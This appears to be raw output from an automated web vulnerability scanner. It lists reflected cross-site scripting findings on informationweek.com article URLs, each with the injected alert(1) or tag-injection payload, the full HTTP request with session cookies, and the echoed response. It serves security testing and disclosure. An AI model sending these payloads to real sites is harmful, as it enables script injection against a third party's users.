The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db385"><a%20b%3dc>b4bd4b44ff4 was submitted in the REST URL parameter 3. This input was echoed as db385"><a b=c>b4bd4b44ff4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/global-cio/interviewsdb385"><a%20b%3dc>b4bd4b44ff4/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31071
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_GlobalCIO_Executive_Insights_Interviews_Welcome_Ad_1x1;key=/news/global-cio/interviewsdb385"><a b=c>b4bd4b44ff4/showAr;kvarticleid=;kvauthor=;loc=300;grp=444312927" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b99'-alert(1)-'94d3e6f12f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news66b99'-alert(1)-'94d3e6f12f6/government/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:52 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:52 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30987
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news66b99'-alert(1)-'94d3e6f12f6/government/policy/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=939714743;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bad26"><script>alert(1)</script>2c1bec5730d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsbad26"><script>alert(1)</script>2c1bec5730d/government/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31037
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/newsbad26"><script>alert(1)</script>2c1bec5730d/government;kvarticleid=;kvauthor=;loc=300;grp=576127032" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcff4"><script>alert(1)</script>c19db7c3f4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/governmentdcff4"><script>alert(1)</script>c19db7c3f4f/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30308
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/governmentdcff4"><script>alert(1)</script>c19db7c3f4f;kvarticleid=;kvauthor=;loc=300;grp=128241705" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce91b'-alert(1)-'048c7f4ffd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/governmentce91b'-alert(1)-'048c7f4ffd0/policy/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:57 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:57 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30258
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/governmentce91b'-alert(1)-'048c7f4ffd0/policy/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=632692783;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bbd'-alert(1)-'9ab2e89291c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/government/policy27bbd'-alert(1)-'9ab2e89291c/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:08 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:08 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30965
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news/government/policy27bbd'-alert(1)-'9ab2e89291c/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=652669780;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84dc6"><a%20b%3dc>f54db508357 was submitted in the REST URL parameter 3. This input was echoed as 84dc6"><a b=c>f54db508357 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/government/policy84dc6"><a%20b%3dc>f54db508357/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30991
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news/government/policy84dc6"><a b=c>f54db508357/showArticle;kvarticleid=;kvauthor=;loc=300;grp=942378040" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5449d"><a%20b%3dc>6ecd8ffaaa7 was submitted in the REST URL parameter 4. This input was echoed as 5449d"><a b=c>6ecd8ffaaa7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/government/policy/5449d"><a%20b%3dc>6ecd8ffaaa7 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:12 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:12 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30809
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Government_Policy_and_Regulation_Welcome_Ad_1x1;key=/news/government/policy/5449d"><a b=c>6ecd8ffaaa7;kvarticleid=;kvauthor=;loc=300;grp=244865892" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16b2"><script>alert(1)</script>9522ca089f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsc16b2"><script>alert(1)</script>9522ca089f3/storage/data_protection/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:41 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:41 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30314
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsc16b2"><script>alert(1)</script>9522ca089f3/storage/da;kvarticleid=;kvauthor=;loc=300;grp=666505416" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b43dd'-alert(1)-'3879876ac66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsb43dd'-alert(1)-'3879876ac66/storage/data_protection/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30252
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsb43dd'-alert(1)-'3879876ac66/storage/data_protection/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=18618214;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5322"><script>alert(1)</script>9b23966dcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/storaged5322"><script>alert(1)</script>9b23966dcf/data_protection/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:46 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:46 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30315
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storaged5322"><script>alert(1)</script>9b23966dcf/dat;kvarticleid=;kvauthor=;loc=300;grp=893344838" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a520'-alert(1)-'5de69536693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage6a520'-alert(1)-'5de69536693/data_protection/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:47 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:47 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30267
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage6a520'-alert(1)-'5de69536693/data_protection/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=582660102;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2282'-alert(1)-'081fec8e555 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/data_protectione2282'-alert(1)-'081fec8e555/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30239
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/data_protectione2282'-alert(1)-'081fec8e555/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=920869709;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb34c"><a%20b%3dc>fb2c05626cc was submitted in the REST URL parameter 3. This input was echoed as fb34c"><a b=c>fb2c05626cc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/storage/data_protectionfb34c"><a%20b%3dc>fb2c05626cc/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30253
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/data_protectionfb34c"><a b=c>fb2c05626cc/show;kvarticleid=;kvauthor=;loc=300;grp=783699064" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faac6'-alert(1)-'1cbe64795bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/data_protection/faac6'-alert(1)-'1cbe64795bd HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
